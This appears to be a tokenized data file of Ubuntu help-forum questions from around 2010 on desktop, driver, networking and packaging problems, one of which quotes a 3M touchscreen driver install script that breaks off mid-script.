3601	how to use rhythmbox python console	maybe this is obvious and i am missing it , or maybe someone 's already written a great guide and my ( seeming exhaustive ) googling is failing to turn it up , but i can not figure out for the life of me how to get the darn python console in rhythmbox to do anything ! i 've enabled it from the plugin menu , and then open it using tools- > python console . it prints you can access the main window through the 'shell ' variable : < rb.shell object at 0xa6cdd24 ( rbshell at 0xa14e000 ) > > > > but anything i type at the prompt does nothing ! i 've tried help , i 've tried exit ( ) , i 've tried print `` hello world '' , nothing does anything ! all of these things work , of course , in a normal python console . i have n't a clue what the devil the difference is here ! am i supposed to do something other than hit enter ?
3609	how do i print cd cover in ubuntu ?	i have and hp officejet 6500 wireless printer and i 'm running ubuntu 10.04 32bit . i want to print cd covers , what kind of software can i use to do that ? i already tried glables , gimp , and image viewer .
3613	how to configure export formats in lyx ?	whenever i try to view a pdf of a document in lyx , i get this error : i get similar errors for dvi and postscript . if i go through file- > export , the only options are other lyx formats and docbook . there is n't even an option to export to latex . how do i configure lyx to export to these formats ? is there at least a way for me to convert to latex so i can use pdflatex to create a pdf ? edit : strangely , this problem fixed itself . i ca n't think of anything i changed to make it happen . perhaps a software update fixed this .
3616	ifolder on ubuntu 10.04 32bits	i 'm trying to install ifolder on ubuntu 10.04 32bits by following the steps presented at https : //help.ubuntu.com/community/ifolderinstall . when issuing the command bzr-buildpackage it seems to download simias.tar.gz and after that , i get the following errors tar -xzvf `` simias.tar.gz '' tar : simias.tar.gz : can not open : no such file or directory tar : error is not recoverable : exiting now tar : child returned status 2 ... any help would be greatly appreciated
3617	how do i create a movie dvd ?	i would like to create a movie dvd that contains some pictures and small movies . i 'm not after anything too fancy , just the ability to add some music , create a title screen and add a menu . basically , something like windows movie maker . what would be my best option ?
3618	how can i use cron to schedule a script that implements daylight saving on a non- dst aware application when my server automatically uses dst ?	my server ( running ubuntu 8.04lts server ) reports the time as 9:38pm bst right now . bst ( british summer time ) is 1 hour ahead of utc ( or greenwich mean time if you really want to confuse matters ) the act of parliament defines that we in the uk use bst for the period beginning at one o'clock , greenwich mean time , in the morning of the last sunday in march and ending at one o'clock , greenwich mean time , in the morning of the last sunday in october . no problems scheduling this in cron but i do n't know what date format/timezone i should be using . do i set it to move forward at 1am but back at 2am when it ends ? that makes sense if the machine uses bst but then i worry that that cron will not trigger at 2am because the system clock might get reset back to 1am before it has a chance to trigger - thus making my script run 1 hour late . or does it just use utc ?
3623	how can i use local .deb files in my pbuilder builds ?	often i need to create packages which another package depend on ( i.e . build dependencies ) . instead of having all those packages first being build in my ppa ( which can sometimes take some time ) , i would like to use the results directory from pbuilder as a source for the pbuilder itself . how can i do this ? can i do this via a hook ?
3627	proprietary bcm wireless driver ceased to work	suddenly , the propriety broadcom sta wireless driver ceased to work on my inspiron 1525 dell . all of a sudden , when i turned on the laptop the tooltip of the wireless indicator in the top panel shows networking disabled . this also cause the wired network interface not to work , unless i manually dhclient it . indeed , lsmod does n't show anything with bcm in it . how can i further troubleshoot the issue ?
3629	how can i stream my desktop via ustream ?	i 'm looking to stream my desktop live via a service such as ustream and having extreme difficulty in finding a solution . i 've tried webcamstudio and it could only use fme files which do n't work with ustream .
3632	how can i make sure that pinning with apt-get is compatible with virtual packages ?	in order to allow php5.2 being used on lucid , i created a ppa ( ppa : txwikinger/php5.2 ) and build several php5.2 packages there . in order to prefer those packages i have given instructions to pin them . however , the packages php5-mcrypt and php5-imap do not correctly load due to the dependency to phpapi , even phpapi is provided by i.e . php5-cgi , php5-cli which are available . what is the problem ?
3642	how can i get neatx or freenx server work with client with past protocol ?	when i use the latest nx libraries , they provide protocol 3.3.0 , however , the lastest qtnx client i found requests protocol 3.0.0 . how can i make both work with each other ?
3645	how do i convert .ts files into something useful ?	i have a file that ends in .ts , which according to wikipedia is an mpeg2 file . i 've never run into a file like this so i want it want the file to be in a more common format/container to use on multiple devices .
3648	multi-touch support with fujitsu t900	the pen works great out of the box . any idea how to get multi-touch working ? thanks !
3651	how can i start dhcp3-server later , so that it waits for a bridge interface to initialise before loading ?	i have ubuntu 10.04 server currently setup with dhcp3-server as well as a bridged interface ( br0 ) for use with virtual machines . the problem i have is that when the server reboots , dhcp3-server fails to load because of the extra delay caused by bringing up the bridged interface . essentially br0 does n't have an ip address for use with dhcp3-server until late in the boot cycle , well after dhcp3-server has attempted to load . once the server has booted i can run '/etc/init.d/dhcp3-server start ' without any issue . is there any way i can either : - force dhcp3-server to wait until the interface has loaded before attempting to load ? - start dhcp3-server after everything else has loaded up ?
3652	ca n't join wifi ad hoc network created by mywi	i want to do iphone tethering using mywi , i can see the network it creates but i just ca n't join . having wep security on would throw me into the passphrase input again and leaving it unprotected does n't connect .
3655	i have screen flickering in ubuntu 10.04 and 10.04.1	my vga controller is intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) . there was no problem is 9.10 , currently m running 9.10 but i want to upgrade to 10.04 , please help ... .i have searched everywhere but m not able to find a solution .
3656	partition advice , how can i stop running out of space on `` / '' partition ?	i run ubuntu 10.04 on an eeepc with a 4gb fast ssd set as the / partition , and a 16gb slower ssd set as the /home partition . i keep running out of space on `` / '' , and can no longer install the latest updates , or new apps . how can i better manage the partitions to avoid this problem ? bear in mind that the large ssd is lower performance so i do n't think i should use this for the os . is it possible to install apps to a different partition when using apt ? any advice ? thank you .
3659	downgrade from one version to a previous version ?	is it at all possible to downgrade from one version of ubuntu to a previous version without doing a re-install similar to the way you can upgrade . if so , what are the required steps ? in this specific case from netbook remix 10.10 to netbook remix 10.04
3662	how can i map super + uparrow to pageup ?	i 'd like to map super + uparrow to pageup super + downarrow to pagedown super + left to home super + right to end on an apple aluminum wireless keyboard . those who know the keyboard would note that it already does these with the fn key by default ; that 's fine , and i 'd like to keep that , but be able to do the same with a one-handed key combination as well , hence my wanting the super mappings . i 've been searching around for a possible way to do this via xmodmap for 3 hours , yet nothing has worked .
3667	black tty 1-6 screens	after installing ubuntu 10.04 i had some flickering issues , so i tried upgrading drivers and such , then i installed the fglrx driver and the flickering have gone away but when trying to access the tty screens from 1-6 the screen goes blank . i 'm able to get back in to gnome on tty7 . any one have a suggestion on what to try here ? dennis the output is : glennwiz @ linux-laptop : ~ $ sudo cat /dev/vcs1 ubuntu 10.04.1 lts linux-laptop tty1 linux-laptop login : nerdfest im using radeon x1300 lspci output 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:01.0 pci bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express pci express root port ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 01 ) 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7 family ) sata ide controller ( rev 01 ) 01:00.0 vga compatible controller : ati technologies inc m52 [ mobility radeon x1300 ] 02:06.0 cardbus bridge : texas instruments pcixx12 cardbus controller 02:06.2 mass storage controller : texas instruments 5-in-1 multimedia card reader ( sd/mmc/ms/ms pro/xd ) 02:06.3 sd host controller : texas instruments pcixx12 sda standard compliant sd host controller 02:06.4 communication controller : texas instruments pcixx12 gemcore based smartcard controller 08:00.0 ethernet controller : broadcom corporation netxtreme bcm5753m gigabit ethernet pci express ( rev 21 ) 10:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) anyone have a suggestion ?
3672	nvidia proprietary driver performance in 10.10	i 've just upgraded to maverick 10.10 beta and notice heavy performance penalty on my nvidia gt240 card . will it be fixed for release ? edit : for me , 260.19.12 fixes all bugs . perfomance & stability now perfect !
3673	how to troubleshoot ubuntu one in maverick beta ?	i just updated to the maverick beta ( actually it 's a fresh install , and not an upgrade of 10.04 ) . but now `` ubuntu one '' does n't show up in my me-menu thing . in addition , when i go to ubuntu one from system- > preferences and attempt to log in from there it will sometimes look like it works , but other times it wo n't do anything . when i go to the command line and type u1sdtool -s it will either say something like `` doing auth dance '' or `` auth failed '' and often it has never even prompted me to log in or try to get a new password ( even though i know it 's correct ) . anyway , this is the main hangup i have with the maverick beta . i ca n't get to my ubuntu one account from the native client . is this a widespread issue ? is there something i can do to fix this ?
3677	disable wireless on startup	i use ubuntu 10.04 and i see , that every time when i start it enables wireless connectivity . i know , that there is a topic about it on ubuntu forums , but i think i will get old before i get an answer there ( if there is one ) . i would like to disable it by default , but to have possibility to enable or disable it later . upd : i 'm looking how to disable wireless adapter . something like fn + ... in windows , but in windows it remembers the last state . in ubuntu wireless adapter is always enabled at startup . re-upd : picture with what i 'm talking about : when i press fn + f2 it disables those diodes and wireless + bluetooth .
3678	how to make my own dropbox / ubuntu one server at home ?	does anybody know of any resources that can show me how to make my own `` dropbox , ubuntu one '' server at home ? i really like the idea of these services , but i do n't want to put my 'stuff ' in the clouds . ideally , it should have a client that runs on linux and windows . i tried to setup ifolder on my ubuntu 10.04 , but without any success so far .
3683	download flock browser in command line	is flock browser available in ubuntu 10.4 . if so how do i download in command line . is it perhaps : sudo apt get flock browser not sure , will appreciate some help . thnxs
3689	clock running too fast	i 'm currently ( for some days now ) having the problem , that my ubuntu clock runs to fast . and by to fast i mean like : last time i adjusted it was at 4 pm , now ( 10:25 pm ) it shows 10:57 pm ! any ideas how to fix that ? could it have something to do with handbrake ? ( i 'm currently ripping my dvd collection , so handbrake is always running ) . my system : ubuntu 10.4 , all updates , handbrake from getdeb ( 0.9.4 i think ) , intel core2quad , 4 gb ram , nvidia gtx 260 ( 195.36.24 according to nvidia-settings ) thx for any help edit : dmesg : http : //pastebin.com/vaanad5e /proc/interrupts : http : //pastebin.com/vazlahzr cmdline : boot_image=/boot/vmlinuz-2.6.32-24-generic root=uuid=082d6800-413b-43d7-b4d1-b96b0d774f32 ro quiet splash
3690	alternative to photoshop or paint.net	i have been moving toward ubuntu from a long time windows development background . the one program i can not seem to do without is a graphic editor . i have seen recommendations for programs , but they turn out to be directed at children or tailored to working with personal photographs . i am looking for something more for programming tasks like analysing colors , resizing , creating web graphics , etc . i have used photoshop in the past and more recently have mostly used paint.net for windows . is there a program for ubuntu that covers this area ?
3697	how do i install fonts ?	question says it all . i need them to be available in gimp .
3700	dosfsck `` unable to create unique name ''	i have an archos 605 media player that seems to have become corrupted , so i 'm trying to run fsck on it . it mounts as a fat32 hard drive , so i ran sudo dosfsck -a and this is what i got : dosfsck 3.0.7 , 24 dec 2009 , fat32 , lfn there are differences between boot sector and its backup . differences : ( offset : original/backup ) 65:03/00 not automatically fixing this . unable to create unique name i suspect this means i 'm screwed , but i 'd appreciate any additional insight from someone who knows more about dosfsck than i do .
3707	automatically change resolution when connecting an external monitor , nvidia driver	i run ubuntu on my macbook pro , with nvidia proprietary driver . i 've made a little hack script http : //www.coldcode.net/2010/05/nvidia-auto-display.html which detects the presence/absence of an external monitor and switches the resolution accordingly . does anybody know of a better way to do that ? my script also works around specific issues of the nvidia partial xrandr implementation ; assuming a xrandr compliant xorg driver , is there a way to do the same thing in a less hackish way ?
3708	how to troubleshoot/bug report a problem that only appears right after startup ?	recently the network manager applet has been crashing immediately after startup and only at startup . it remains stable throughout the rest of the day . how would i begin to discover what the issue is ? there must be a general method of attack on a problem like this . normally i would try running the program from the terminal to see if any error messages are printed but nm-applet does not seem to crash once i restart it .
3710	how can i stop bluetile from changing the window manager theme ?	when i start bluetile it replaces the current theme of the window manager . how can i keep the current theme and settings , and still use bluetile ?
3719	how can i set different sensitivities for two mice at the same time ?	i often use a usb mouse and my laptop 's pointing stick at the same time . i can adjust the sensitivity in mouse preferences , but the sensitivities of the two mice are so different that i can not find a compromise setting . is there a way to specify a different sensitivity setting for each mouse ?
3720	loading/shutdown gui problems ?	i am using a partition created from wubi , and this is only because windows is needed for activities like gaming and watching movies on certain websites that require the silverlight plugin . all of the partitions i have created in the past have worked fine . this new install , however , has a problem . i formated a month or so back to allow more space . back then , i only created a partition that allowed for a few gigs of space . i deleted the partition in windows and gave myself the 30gb partition . this is because i planned to work from my ubuntu partition entirely except for the above-mentioned things . it worked fine for a week or so . then , for some reason , the ubuntu loading screen ( the purple one with the four or five red dots that slowly light up ) went wrong . instead of coming to this screen from start-up in my native resolution of 1440x900 and having the dots all light up before the operating system presented the login screen , the system waited a while at the screen with the blinking underscore , then quickly flashed green , presented the purple ubuntu screen in a low resolution , allowed time for only 2 or 3 dots to light up , and the instantly took me to the login screen . this was originally only a problem with start-up . however , it is now a problem with shutdown too , and i fear it might be detrimental to my system the way it works . whenever i shut down , the same purple ubuntu screen comes up in low resolution . there is no green flash here . it just appears after my programs are assumed to have closed . the dots begin to light up , and after only a couple of the dots light up as opposed to all of them , the system suddenly just shuts down . lately , it has also had some other problems . these happen every once in a while as in every three or four days . when i go to shut down , the purple ubuntu screen will appear but without the dots yet still in a low resolution mode . there will be some text over the logo as if it is a terminal outputting information from the system about closing programs , killing the system , and so on . sometimes this text appears for a short while before the shutdown . other times , my system has actually been stuck on this screen ; requiring a hard shutdown . in fact , when i installed kubuntu desktop environment a few weeks back ( this was after the problem , so it 's not kde ) , i shut down my computer and went to bed without confirming it had shut down . when i woke up , my computer had literally sat all night at the kubuntu logo display screen ; having failed to shut down . does anyone know what the problem is ? i do n't think it 's my graphics card or processor or anything , even though both of them currently have their problems . windows loads fine . the ubuntu partition works fine when i am working in it . there are no problems elsewhere . i do not remember installing any software that would do this . the last big modification to my system around the time this started were simple changes of my desktop wallpaper .
3727	from the time ubuntu font is released , how long will it take for major websites ( facebook , yahoo , google etc . ) to support it ?	the title explains it already ...
3732	change font used in the tab-bar of treestyletab	firefox 3.6.8 on ubuntu 9.10 ; using treestyletab 0.10.2010040201 . i use the tab-bar on the right , and i would like to see more of the tab names without widening the bar . the default font used is sans , i believe ; i would like to use something like condensed dejavu sans . i have n't found anything in the settings , nor in the about : config page , so i presume i can play some .css trick , but i do n't know where to start . how can i do this change ?
3735	monitor resolution 1366 x 768 , with bad edid detected	i 'm having trouble getting a cheap lcd 18.5 inch monitor to work properly with ubuntu 10.04.1 . the brand is `` great wall '' . it 's supposed to have resolution 1366x768 , but i can only set it as 1360x768 . i have ubuntu installed on an external hard drive , and for what it 's worth , at work i have a nicer 18.5 inch monitor , hp brand , also 1366 x 768 , and it works perfectly when i boot there . i have tried using cvt , but it gives me this : $ cvt 1366 768 # 1368x768 59.88 hz ( cvt ) hsync : 47.79 khz ; pclk : 85.25 mhz modeline `` 1368x768_60.00 '' 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync i managed to add this 1368 x 768 mode to my xorg.conf , that i generated using some command i ca n't remember now ( sorry ! ) , but it looked just as bad as 1360 x 768 , so i undid the change . i can live with it for watching video , but any extended openoffice session makes me want to poke my eyes out : ) i 'm using intel graphics : 00:02.0 vga compatible controller : intel corporation 82915g/gv/910gl integrated graphics controller ( rev 04 ) any suggestions ? can i get the edid out of the hp monitor and try to override it for the monitor at home ? ( and cross my fingers ) edit : i have added the xorg-edgers ppa , and it did n't make any difference . here is my xorg.0.log in case it helps : http : //clippy.cz.cc/index.php ? show=124 edit2 : i got the modeline for 1366 x 768 on the hp monitor at work . going to try it at home and see what happens . this is what i got from the xorg.0.log when booting the computer with my external hd with ubuntu 10.04 : modeline `` 1366x768 '' x0.0 85.50 1366 1435 1578 1790 768 771 781 798 -hsync +vsync ( 47.8 khz ) edit3 : tried the modeline above , and it gave similar results to modelines for 1360 and 1368 . but then i noticed something , so see below for the answer to my own question : )
3743	video tearing sorted now low cube performance	i 've just sorted out the tearing in videos on my pc following this guide : http : //ubuntuforums.org/showthread.php ? t=1390284 however before this i had a wonderfully performing cube , nice smooth and no/very little tearing ( at least only around the sides ) now however the cube feels slow when rotating and i get some sort of tearing ( white lines ) underneath my gnome panel when 'landing ' on a desktop any ideas how i can return to the previous performance of the cube without turning sync to vblank off ?
3744	how do i modify my path so that the changes are available in every terminal session	i want to add a directory to search my search path . i know i have to modify the $ path environment variable . however , i want the change to be permanent , so that it is always in effect , for every terminal ( bash ) window i open . there is an overload of confusing and possibly conflicting information on https : //help.ubuntu.com/community/environmentvariables i am using ubuntu 10.04 . suppose i want to add /usr/local/foo to my $ path . which file ( .bashrc , .profile , .bash_login , etc ... ) should i modify and what should the new line ( s ) look like ?
3749	suspend does n't work on dell inspiron 1525	i 'm having a dell inspiron 1525 . suspend and resume were working correctly . all of a sudden , when i click the suspend menu option the system does n't get suspended . instead , it is being locked . viewing dmesg output reveals [ 48214.876143 ] sky2 eth0 : disabling interface [ 48215.844400 ] pm : syncing filesystems ... done . [ 48215.872063 ] pm : preparing system for mem sleep [ 48215.872070 ] freezing user space processes ... ( elapsed 0.00 seconds ) done . [ 48215.873464 ] freezing remaining freezable tasks ... ( elapsed 0.00 seconds ) done . [ 48215.873582 ] pm : entering mem sleep [ 48215.873597 ] suspending console ( s ) ( use no_console_suspend to debug ) [ 48225.872091 ] usbhid 6-2:1.0 : suspend error -5 [ 48225.872100 ] pm_op ( ) : usb_dev_suspend+0x0/0x20 returns -5 [ 48225.872104 ] pm : device 6-2 failed to suspend : error -5 [ 48225.872106 ] pm : some devices failed to suspend [ 48225.876917 ] pm : resume of devices complete after 4.807 msecs [ 48226.076192 ] pm : resume devices took 0.204 seconds [ 48226.076203 ] pm : finishing wakeup . [ 48226.076205 ] restarting tasks ... done . [ 48226.388912 ] sky2 eth0 : enabling interface [ 48226.390582 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 48227.894532 ] sky2 eth0 : link is up at 100 mbps , full duplex , flow control rx [ 48227.894999 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 48237.172073 ] eth1 : no ipv6 routers present in particular usbhid 6-2:1.0 : suspend error -5 . google did n't find anything useful about that . how can i further troubleshoot this matter ?
3750	what precautions should i take when exposing my desktop directly to the internet ?	i 've always used my ubuntu desktop behind the security of a router with nat , but there have been a few times when i 've had to plug it directly into an active cable modem . in general , what precautions i should be taking in situations when my computer is exposed to the internet like this for extended periods of time ? specifics that immediately come to mind are : are there any default network services i might want to disable ? is there a need to modify the default firewall configuration ? should i be concerned about services using password authentication ? what kind of logging can i do to be notified of unauthorized access ? i realize that questions like this are just the tip of the iceberg of expansive topics that entire professions are based upon , so let me make clear : what i 'm looking for are a few straightforward recommendations of best practices or configuration changes that a desktop user would find useful in a default ubuntu installation .
3759	change directory ( cd ) but by replacing a part of the path only	not sure if it is possible , but i seem to remember from my old days using aix it was possible to change my path by just saying which part of the path needed to be replaced by something else . for instance , say i have two paths : /etc/application-2.0.1/options/default and /etc/application-1.0.8/options/default that i could switch from folder 1 to 2 using a command like cd /2.0.1/1.0.8/ which would replace , in the path , the string 2.0.1 to 1.0.8 . obviously this does not work for me now . but is there a way to do this ?
3763	setting up a 3m serial touchscreen	i 've been attempting for quite a long time to get a serial 3m touchscreen to work on ubuntu 10.04 the closest post i could find to what i needed was this one : http : //ubuntuforums.org/showthread.php ? t=1508944 & highlight=3m+touchscreen unfortunetly i get to where i touch the screen and the mouse jumps to the top right corner and that is it . the calibration software does n't really work ( strait from 3m ) . either sometimes it wont start , or there is something wrong with it . edit it now looks like the problem has to do with the calibration software not recongnizing the attached touchscreen . with some changes to the install script i was able to get the calibration software to install properly # ! /bin/bash # # copyright 2007-2009 3m . all rights reserved . # # this script installs the mt7 touch screen driver # during installation , all directories must be writeable . # # these symbols point to where the mt7 software binaries and data reside . # the script attempts to detect where the installation kit is . if this # fails , you need to set bindir . # the data directory must be on writeable media . the script normally uses # the directory where the installation kit resides as the data directory . # if you need the data directory to be elsewhere , set datadir . bindir= '' '' datadir= '' '' # if desired , define a file to contain driver startup options and set # the twdrv_cfg symbol to the full path of the file . normally this is # not needed . twdrv_cfg= '' '' # this symbol points to where the java vm binaries reside . javabindir= '' '' # these symobls point to system and applictaion directories other than # those specific to the mt7 software udevdir= '' /etc/udev '' hotplugdir= '' /etc/hotplug '' xorgdir= '' /usr/lib/xorg/modules/input '' xfree86dir= '' /usr/x11r6/lib/modules/input '' libdir= '' /usr/lib '' sedir1= '' /usr/selinux/booleans '' sedir2= '' /selinux/booleans '' lsbdir= '' /lib/lsb '' # the initdir symbol points to where this script places an 'init ' script . # if left blank , this script first looks for /etc/init.d and then /etc/rc.d . # if this is not appropriate or this script otherwise fails , set this value . initdir= '' '' # this symbol enables permission for some mt7 shared objects on # selinux systems . on most systems segivepermission is texrel_shlib_t . # change this variable if another security type is appropriate . segivepermission= '' texrel_shlib_t '' # this symbol affects when the x input driver converts raw touch screen # coordinates into screen coordiates . normally , the x input driver reports # the raw coordinates to the x server which then calls an conversion # routine . some versions of the x server expect the initial report to # contain converted coordinates . if your touch behavior is off and # calibration does not address the problem , set convertatread to true . convertatread= '' false '' # this symbol defines the name of the xorg.conf file to generate if one is # not found . starting with x server version 1.5 , this file is not # automatically generated . this file is needed for mt 7 for linux to work . # if you want the file to reside elsewhere , set this symbol . xorgconf= '' /etc/x11/xorg.conf '' # these symbols define where the 50mt7-xinit script needs to go and what # suffix it requires . the script places this file automatically in # /etc/x11/xinit/xinitrc.d and /etc/x11/xsession.d without a suffix . if # your distribution requires another location or requires a suffix on the # file , set these symbols . xinitdir= '' '' xinitsuffix= '' '' # determine the installation directory if [ -z $ bindir ] then if [ $ ( echo $ 0 | grep ^/ ) ] then bindir= $ 0 else bindir= $ ( echo $ pwd '' / '' $ 0 | sed s # [ . ] / # # ) fi bindir= $ ( echo $ bindir | sed s % / [ ^/ ] * $ % % ) fi # determine if the system is compatible $ bindir/twcompat if [ $ ? ! = 0 ] then echo `` error : mt7 for linux not installed - shared memory support not detected '' exit fi # determine the data directory [ -z $ datadir ] & & datadir= $ bindir # create the data and fifo directories if [ $ datadir ! = $ bindir ] then [ -e $ datadir ] || mkdir $ datadir chmod a+w $ datadir ln -s $ datadir $ bindir/data else [ -e $ bindir/data ] || mkdir $ bindir/data fi chmod a+w $ bindir/data [ -e $ bindir/data/fifo ] || mkdir $ bindir/data/fifo chmod a+w $ bindir/data/fifo # determine the init script directories if [ -z $ initdir ] & & [ -d /etc/init.d ] then if [ $ ( ls -l /etc/init.d/ | sed -e /functions/d -e /^total\ [ 0-9 ] * $ /d | wc -l ) ! = 0 ] then initdir= '' /etc/init.d '' fi fi if [ -z $ initdir ] then if [ -e /etc/rc.d/rc.local ] then initdir=/etc/rc.d else initdir= $ bindir fi fi # install the init script [ -e $ initdir/twdrvstartup ] & & rm -f $ initdir/twdrvstartup sed -e s # % bindir % # $ bindir # g \ -e s # % initdir % # $ initdir # g \ -e s # % lsbdir % # $ lsbdir # g \ -e s # % twdrv_cfg % # $ twdrv_cfg # g $ bindir/twdrvstartup.orig \ > $ initdir/twdrvstartup chmod a+x $ initdir/twdrvstartup if perl $ bindir/twisthere.perl chkconfig then chkconfig -- add twdrvstartup > /dev/null elif perl $ bindir/twisthere.perl update-rc.d then update-rc.d twdrvstartup defaults > /dev/null elif [ -e $ initdir/rc.local ] then sed -e ' $ a\ % initdir % /twdrvstartup start ' $ initdir/rc.local > $ initdir/rc.local.temp rm -f $ initdir/rc.local sed -e s # % initdir % # $ initdir # $ initdir/rc.local.temp > $ initdir/rc.local rm -f $ initdir/rc.local.temp chmod +x $ initdir/rc.local else echo `` can not install the init script '' fi # test for usb support if [ -z $ ( uname -r | grep ^2\.4\ . ) ] then # copy the udev rules script hotplug=0 if [ -d $ udevdir/rules.d ] then if [ -e $ udevdir/rules.d/99-twdriver.rules ] then rm -f $ udevdir/rules.d/99-twdriver.rules fi sed s # % bindir % # $ bindir # g $ bindir/99-twdriver.rules.orig \ > $ udevdir/rules.d/99-twdriver.rules hotplug=1 fi if [ -d $ hotplugdir/usb ] & & [ -e $ hotplugdir/usb.agent ] then [ -e $ hotplugdir/usb/twhotplug ] & & rm -f $ hotplugdir/usb/twhotplug sed s # % bindir % # $ bindir # g $ bindir/twhotplug.orig > $ hotplugdir/usb/twhotplug chmod a+x $ hotplugdir/usb/twhotplug [ -e $ hotplugdir/usb.usermap ] || echo `` # created by mt7 '' > $ hotplugdir/usb.usermap sed < $ hotplugdir/usb.usermap > $ hotplugdir/usb.usermap.temp ' $ a\ # twhotplug is for the mt7 for linux software\ twhotplug 0x0001 0x0596 0x0000 0x0000 0x0000 0x00 0x00 0x00 0x06 0x00 0x00 0x00000000 ' rm -f $ hotplugdir/usb.usermap mv $ hotplugdir/usb.usermap.temp $ hotplugdir/usb.usermap hotplug=1 fi if [ $ hotplug == 0 ] then echo `` hotplugging of usb touch screen controllers is not supported '' fi else echo `` usb touch screen controllers are not supported under kernel 2.4 '' fi # test for the version of c++ standard libraries if [ -e $ libdir/libstdc++.so.6 ] then cppext= '' 6 '' elif [ -e $ libdir/libstdc++.so.5 ] then cppext= '' 5 '' else echo `` can not find needed libstdc++.so in $ libdir '' cppext= '' '' fi # link the libraries into /usr/lib perl $ bindir/twlibinstall.perl install $ libdir $ bindir/lib*.so if [ x $ cppext ! = x ] then perl $ bindir/twlibinstall.perl install $ libdir $ bindir/so $ cppext/lib*.so fi # link rnr sensitive files if [ x $ cppext ! = x ] then $ bindir/twlibtest $ libdir/libtwsystemrnr12.so if [ x $ ? ! = x0 ] then rm -f $ libdir/libtwsystem.so ln -s $ libdir/libtwsystemrnr12.so $ libdir/libtwsystem.so ln -s $ bindir/twmonitorrnr.bin $ cppext $ bindir/twmonitor else $ bindir/twlibtest $ libdir/libtwsystemrnr.so if [ x $ ? ! = x0 ] then rm -f $ libdir/libtwsystem.so ln -s $ libdir/libtwsystemrnr.so $ libdir/libtwsystem.so ln -s $ bindir/twmonitorrnr.bin $ cppext $ bindir/twmonitor else ln -s $ bindir/twmonitor.bin $ cppext $ bindir/twmonitor fi fi fi # copy the x input driver xcopydefault=0 if [ -d $ xorgdir ] then xdir= $ xorgdir if [ -z `` $ ( x -version 2 > & 1 | grep x\.org [ ^1 ] *1\. [ 4-9 ] \ . ) '' ] then xsrc= $ bindir/twxinput_drv.so elif [ -z `` $ ( x -version 2 > & 1 | grep x\.org [ ^1 ] *1\. [ 5-9 ] \ . ) '' ] then xsrc= $ bindir/twxinput_drv.so.1.4 else xsrc= $ bindir/twxinput_drv.so.1.5.1 xcopydefault=1 fi elif [ -d $ xfree86dir ] then xdir= $ xfree86dir xsrc= $ bindir/twxinput_drv.so else xdir= '' '' echo `` can not install the x input module '' fi if [ -d $ xdir ] then [ -e $ xdir/twxinput_drv.o ] & & rm -f $ xdir/twxinput_drv.o [ -e $ xdir/twxinput_drv.so ] & & rm -f $ xdir/twxinput_drv.so ln -s $ xsrc $ xdir/twxinput_drv.so fi # install the xinit scripts if [ -d /etc/x11/xinit/xinitrc.d ] then sed s # % bindir % # $ bindir # g $ bindir/50mt7-xinit.orig \ > /etc/x11/xinit/xinitrc.d/50mt7-xinit $ xinitsuffix chmod a+x /etc/x11/xinit/xinitrc.d/50mt7-xinit $ xinitsuffix fi if [ -d /etc/x11/xsession.d ] then sed s # % bindir % # $ bindir # g $ bindir/50mt7-xinit.orig \ > /etc/x11/xsession.d/50mt7-xinit $ xinitsuffix chmod a+x /etc/x11/xsession.d/50mt7-xinit $ xinitsuffix fi if [ x $ xinitdir ! = x ] then sed s # % bindir % # $ bindir # g $ bindir/50mt7-xinit.orig \ > $ xinitdir/50mt7-xinit $ xinitsuffix chmod a+x $ xinitdir/50mt7-xinit $ xinitsuffix fi # set up the selinux security types if [ -d $ sedir1 ] then sedir= $ sedir1 elif [ -d $ sedir2 ] then sedir= $ sedir2 else sedir= '' '' fi if [ x $ sedir ! = x ] then chcon -t $ segivepermission $ libdir/libtwsystem.so chcon -t $ segivepermission $ libdir/libtwconfig.so chcon -t $ segivepermission $ libdir/libtwio_utilities.so chcon -t $ segivepermission $ libdir/libtwappio_jni.so chcon -t $ segivepermission $ libdir/libtwcommon_jni.so chcon -t $ segivepermission $ libdir/libtwconfig_jni.so chcon -t $ segivepermission $ libdir/libtwui_jni.so chcon -t $ segivepermission $ libdir/libtwuicp.so [ -e $ xdir/twxinput_drv.so ] & & chcon -t $ segivepermission $ xdir/twxinput_drv.so fi # set up the configuration [ -d /dev/shm ] & & rm -f /dev/shm/*twconfig* sed s # % bindir % # $ bindir # g $ bindir/twframework.cfg.orig > $ bindir/twframework.cfg $ bindir/twcfgutil /u $ bindir/twframework.cfg $ bindir/twcfgutil /u $ bindir/twfactory.cfg # produce the remove script sed -e s # % bindir % # $ bindir # g \ -e s # % udevdir % # $ udevdir # g \ -e s # % xdir % # $ xdir # g \ -e s # % libdir % # $ libdir # g \ -e s # % sedir % # $ sedir # g \ -e s # % hotplugdir % # $ hotplugdir # g \ -e s # % initdir % # $ initdir # g \ -e s # % xinitdir % # $ xinitdir # g \ -e s # % xinitsuffix % # $ xinitsuffix # g \ $ bindir/remove.orig > $ bindir/remove # produce the x input script sed -e s # % convert % # $ convertatread # g \ $ bindir/twxinputinstall.perl.orig > $ bindir/twxinputinstall.perl # produce the cp start script sed -e s # % javabindir % # $ javabindir # g \ -e s # % bindir % # $ bindir # \ $ 